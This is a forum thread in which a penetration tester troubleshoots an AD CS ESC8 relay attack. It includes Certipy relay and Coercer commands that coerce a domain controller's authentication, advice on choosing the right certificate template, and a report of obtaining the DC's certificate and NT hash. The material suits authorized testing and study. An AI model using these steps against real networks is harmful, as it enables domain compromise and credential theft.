Help understanding "relay" issues?

[7MinSec]

Hello!

I'm on a pentest where Certipy has reported a host called "CA" is vulnerable to ESC8.

I setup Certipy in one window as follows:

certipy relay -ca ca.domain.com

In another window I did Coercer with:

coercer.py -u lowprivuser -p mypass -t IP.OF.A.DC -l MY.KALI.IP.ADDRESS

In the Certipy window I get:

Targeting http://ca.domain.com/certsrv/certfnsh.asp
Listening on 0.0.0.0:445
Requesting certificate for 'DOMAIN\\DC$' based on the template "Machine'
Request ID is 123
Would you like to save the private key? (y/N)

It seems like this is the kind of behavior I'd expect to see if the config was vulnerable to ESC7.

Any help pointing me in the right direction to troubleshoot would be much appreciated!

Thanks,
Brian

[jsdhasfedssad]

Since you are coercing authentication from the machine account of a DC and not a regular machine, try adding the flag "-template DomainController" to the Certipy command. If that template is missing, try "-template KerberosAuthentication". As you can see from the output of Certipy, that defaults to the "Machine" template.

Also note that you probably don't need to authenticate to the DC when coercing from it :)

[7MinSec]

Hello and thanks for the help!

When I run with -template Domaincontroller the tool output says:

Targeting http://ca.domain.com/certsrv/certfnsh.asp
Listening on 0.0.0.0:445
Requesting certificate for 'DOMAIN\\DC$' based on the template "DomainConroller'
Template 'DomainController' is not supported by AD CS

If I do -template KerberosAuthentication I get the same sort of thing:

Template "KerberosAuthentication' is not supported by AD CS

[jsdhasfedssad]

Which templates are enabled on the ADCS server? Can you list them using Certipy? Unless of course you think that would be sensitive to share given that you are currently on a pentest.

[7MinSec]

Hello, yeah I think being this is my first time with ESC8 I might've been approaching this the wrong way. But to answer your question, when I do a find -enabled with Certipy I get (sanitized):

Certificate Authorities
0
CA Name: CA0
DNS Name: CA0.domain.com
...
<snip>
...

Then as I continue down through the Certificate Templates section, I have one called DC that is on the CA0 certificate authority. For Enrollment Rights, Domain Controllers is in the list.

Does that mean I should do Certipy relay -ca ca0.domain.com -template DC and then try Coercer again?

[jsdhasfedssad]

If you do not see the default templates "DomainController" or "KerberosAuthentication" they may not be published for some reason. Your client may have replaced the "DomainController" template with their own template named "DC". Yes try using that instead.

[7MinSec]

@jsdhasfedssad you're an absolute champ, thank you. YES that was the case in that the DomainController template had been renamed. Once I got the name right the pfx got generated and DC NT hash came shortly after. Cheers!